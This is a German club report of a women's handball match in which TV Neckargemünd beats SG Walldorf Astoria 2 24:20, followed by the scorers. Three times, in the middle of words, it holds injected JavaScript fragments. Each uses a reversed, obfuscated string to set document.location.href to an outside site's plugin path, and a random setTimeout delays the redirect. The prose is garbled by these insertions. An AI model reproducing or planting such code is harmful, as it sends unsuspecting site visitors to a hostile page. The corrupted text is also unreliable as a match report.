Am Sonntag, den 30.03.2014 fand das letzte Saisonspiel der Damen des TV Neckargemünd statt. In der Münzenbachhalle traf man auf die Damen der SG Walldorf Astoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria 2 mit dem Ziel, die letzten noch verbleibenden zwei Punkte zu holen. Das schafften die Neckargemünder Damen in einem durchwachsenen Spiel und sicherten sich dadurch den zweiten Tabellenplatz durch das Endergebnis: TV Neckargemünd – SG Walldorf Astoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria 2 24:20 (10:10)
Neckargemünd, 18.03.14 (bth) – In der ersten Halbzeit konnte man nicht überzeugen. Wie im Spiel zuvor, geriet Neckargemünd zu Beginn mit 0:3 in einen Rückstand. Man hatte mal wieder den Start verschlafen. In der Abwehr gab es große Probleme und es dauerte eine Weile, bis sich die TV Damen auf den Gegner einstellten. Bis fünf Minuten vor Halbzeitende lief Neckargemünd dem Rückstand hinterher. Erst dann konnten sie zum 8:8 ausgleichen. Nach dieser durchwachsenen ersten Halbzeit gingen die TV Damen mit einem 10:10 in die Kabine.
Trainer ging trotzdem fest von einem Sieg aus
Trainer T. Uremovic ging fest von einem Sieg aus. Er gab wertvolle Tipps und versuchte uns auf die letzten dreißig Minuten einzustellen. Diese Tipps wurden diesmal konsequent und mit viel Kampfgeist umgesetzt.
Abwehrleistung wurde deutlich besser
Gleich zu Beginn der zweiten Halbzeit konnte man sich mit zwei Toren zum 13:11 absetzen. Jetzt hatte man auch den Gegner in der Abwehr im Griff. Durch schön heraus gespielte Aktionen und die toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolle Unterstützung der Fans, kam ab Mitte der zweiten Halbzeit kein Zweifel mehr auf. Diese zwei Punkte holt sich Neckargemünd. Jetzt liefen die Damen der SG Walldorf zeitweise einem sechs Tore Rückstand hinterher und das Spiel nahm an Härte zu. Dennoch schafften sie es nicht, das Spiel nochmal zu ihren Gunsten zu drehen.
Das letzte Saisonspiel endete mit einem 24:20 Sieg und somit mit dem gesteckten Ziel, den zweiten Tabellenplatz zu sichern.
Mit einem lachenden und einem weinenden Auge beendeten die Spielerinnen Kira Höfer und Bettina Thiele an diesem Nachmittag ihre langjährige Handballkarriere. Sie freuen sich nun, Euch als treue Fans in der nächsten Saison zu begleiten.
Es spielten:
Im Tor: Kira Höfer
Im Feld: Charlotte Koch (9/4), Kathrin Knauf (2), Sina Illenberger (2),Laura Maier (2), Anna Runz (1), Carolyn Gerstner (1), Bettina Thiele (3), Sandra Drescher (1), Luisa Bucher (4), Jessica Lehr